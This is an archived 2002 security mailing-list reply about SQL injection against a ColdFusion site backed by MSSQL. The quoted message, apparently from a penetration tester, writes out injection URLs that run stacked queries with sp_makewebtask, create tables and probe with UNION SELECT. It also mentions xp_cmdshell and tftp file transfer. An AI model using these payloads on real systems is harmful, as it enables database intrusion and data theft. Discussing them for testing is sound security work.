Re: SQL INJECTION IN Coldfusion

From: Cesar (cesarc56@yahoo.com)
Date: Fri Sep 13 2002 - 22:04:37 EDT

• Next message: fedaikin@altern.org: "Re : finding ethereal"
• Previous message: Steven Walker: "Application & Iplanet/Apache web server vulnerability and penetration testing"
• In reply to: Mr Ro: "SQL INJECTION IN Coldfusion"
• Next in thread: wirepair: "Re: SQL INJECTION IN Coldfusion"
• Reply: wirepair: "Re: SQL INJECTION IN Coldfusion"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Hi.
You must use UNION ALL to get all the rows.

For new techniques take a look a this paper:

Manipulating MS Sql Server using sql injection.
http://www.appsecinc.com/news/briefing.html#inject

Cesar.

--- Mr Ro <vnmrro@yahoo.com> wrote:
> hello pen-tester,
> I am dealing with a pen-test agains a CFM server
> with
> MSSQL as backend. It is vulnerable with direct SQL
> injection.
> I figure out that I can create,drop...table, execute
> xp_cmdshell, sp_makewebtask, so i submit:
> submit:
> http://mysite/file.cfm?id=4546;exec sp_makewebtask
> "C:\winnt\temp\blah.htm","select * from
> master..sysmessages"--
> it's okay, and I want to get
> "C:\winnt\temp\blah.htm".
> I submit:
> http://mysite/file.cfm?id=4567;create table blah
> (line
> varchar(8000))--
> and then, I submit:
> http://mysite/file.cfm?id=4567 UNION SELECT line
> from
> mrro--
> it returns an error complain that "All queries in an
> SQL statement containing a UNION operator must have
> an
> equal number of expressions in their target lists."
> so
> I keep adding "line" in my request url
> (http://mysite/file.cfm?id=4567 UNION SELECT
> line,line,line from mrro--), finally it returns an
> error message like this:
> "[Microsoft][ODBC SQL Server Driver][SQL Server]The
> text, ntext, or image data type cannot be selected
> as
> DISTINCT."
> question here: who can explain me what happened ?
>
> I know there is another way to download or upload
> files using "tftp", so is there any free "tftp"
> server
> for me to use instead of installing a new one ?
> thank for reading.
> best regards
> mrro
>
> __________________________________________________
> Do you Yahoo!?
> Yahoo! News - Today's headlines
> http://news.yahoo.com
>
>
----------------------------------------------------------------------------
> This list is provided by the SecurityFocus Security
> Intelligence Alert (SIA)
> Service. For more information on SecurityFocus' SIA
> service which
> automatically alerts you to the latest security
> vulnerabilities please see:
> https://alerts.securityfocus.com/
>

__________________________________________________
Do you Yahoo!?
Yahoo! News - Today's headlines
http://news.yahoo.com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

• Next message: fedaikin@altern.org: "Re : finding ethereal"
• Previous message: Steven Walker: "Application & Iplanet/Apache web server vulnerability and penetration testing"
• In reply to: Mr Ro: "SQL INJECTION IN Coldfusion"
• Next in thread: wirepair: "Re: SQL INJECTION IN Coldfusion"
• Reply: wirepair: "Re: SQL INJECTION IN Coldfusion"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:25 EDT